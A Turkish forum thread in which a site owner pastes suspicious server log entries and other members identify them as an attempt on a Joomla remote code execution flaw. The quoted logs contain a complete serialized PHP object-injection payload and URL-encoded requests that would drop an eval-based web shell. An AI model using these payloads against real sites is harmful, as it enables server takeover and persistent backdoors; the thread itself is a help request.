94.23.255.34
}__test|O:21:\JDatabaseDriverMysqli\:3:{s:2:\fc\;O:17:\JSimplepieFactory\:0:{}s:21:\\\0\\0\\0disconnectHandlers\;a:1:{i:0;a:2:{i:0;O:9:\SimplePie\:5:{s:8:\sanitize\;O:20:\JDatabaseDriverMysql\:0:{}s:8:\feed_url\;s:46:\eval($_REQUEST[1]);JFactory::getConfig();exit;\;s:19:\cache_name_function\;s:6:\assert\;s:5:\cache\;b:1;s:11:\cache_class\;O:20:\JDatabaseDriverMysql\:0:{}}i:1;s:4:\init\;}}s:13:\\\0\\0\\0connection\;b:1;}\xf0\x9d\x8c\x86
burdan giriş olduktan sonra google.hk den bir çok giriş olmuş yabancı bir kaç forumda saldırı demişler yardım ederseniz sevinirim
Bu saldırımı acaba? |
11 Mesajlar | 1.576 Okunma | ||
- Üyelik 23.08.2016
- Yaş/Cinsiyet 42 / K
- Meslek sekreter
- Konum Eskişehir
- Ad Soyad E** S**
- Mesajlar 57
- Beğeniler 43 / 7
- Ticaret 0, (%0)
- Üyelik 30.03.2019
- Yaş/Cinsiyet 23 / E
- Meslek Öğrenci
- Konum İstanbul Anadolu
- Ad Soyad M** D**
- Mesajlar 338
- Beğeniler 115 / 110
- Ticaret 1, (%100)
Kendi ip 'nin ve hosting firmanizin ip adreslerinden biri değilse yukardaki hack olma ihtimali %200
- Üyelik 28.03.2018
- Yaş/Cinsiyet 27 / E
- Meslek Bilişim
- Konum Denizli
- Ad Soyad S** K**
- Mesajlar 411
- Beğeniler 67 / 90
- Ticaret 0, (%0)
Hosting firmanıza sorsanız daha mantıklı bence
- Üyelik 06.09.2013
- Yaş/Cinsiyet 32 / E
- Meslek Cyber Sec & Project Manager
- Konum Ankara
- Ad Soyad M** G**
- Mesajlar 3356
- Beğeniler 481 / 1987
- Ticaret 10, (%100)
Joomla Remote Code Execution açığından faydalanmaya çalışan bir saldırgan, Joomlayı güncelleyin.
- Üyelik 23.08.2016
- Yaş/Cinsiyet 42 / K
- Meslek sekreter
- Konum Eskişehir
- Ad Soyad E** S**
- Mesajlar 57
- Beğeniler 43 / 7
- Ticaret 0, (%0)
Kendi ip 'nin ve hosting firmanizin ip adreslerinden biri değilse yukardaki hack olma ihtimali %200
94.23.255.34 ip adresi
- Üyelik 23.08.2016
- Yaş/Cinsiyet 42 / K
- Meslek sekreter
- Konum Eskişehir
- Ad Soyad E** S**
- Mesajlar 57
- Beğeniler 43 / 7
- Ticaret 0, (%0)
Hosting firmanıza sorsanız daha mantıklı bence
sordum onlarada bu cevabı vereiler ama bence saldırı
Herhangi bir saldırı gözükmüyor.
Sadece ziyaretçileriniz gözükmektedir.
Genel olarak ziyaretçiler google yandex gibi bot servisleri olarak gözüküyor.
- Üyelik 23.08.2016
- Yaş/Cinsiyet 42 / K
- Meslek sekreter
- Konum Eskişehir
- Ad Soyad E** S**
- Mesajlar 57
- Beğeniler 43 / 7
- Ticaret 0, (%0)
Joomla Remote Code Execution açığından faydalanmaya çalışan bir saldırgan, Joomlayı güncelleyin.
wordpress kullanıyorum ben joomla değil hocam yabancı forum sitelerindede joomlayla ilgili birşeyler yazıyordu ama
- Üyelik 23.08.2016
- Yaş/Cinsiyet 42 / K
- Meslek sekreter
- Konum Eskişehir
- Ad Soyad E** S**
- Mesajlar 57
- Beğeniler 43 / 7
- Ticaret 0, (%0)
Başvuru urlsi bu şekilde
//administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
//administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
- Üyelik 06.09.2013
- Yaş/Cinsiyet 32 / E
- Meslek Cyber Sec & Project Manager
- Konum Ankara
- Ad Soyad M** G**
- Mesajlar 3356
- Beğeniler 481 / 1987
- Ticaret 10, (%100)
wordpress kullanıyorum ben joomla değil hocam yabancı forum sitelerindede joomlayla ilgili birşeyler yazıyordu ama
Wordpress kullanıyorsan, seni ilgilendiren bir durum yok rahatına bak :)
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)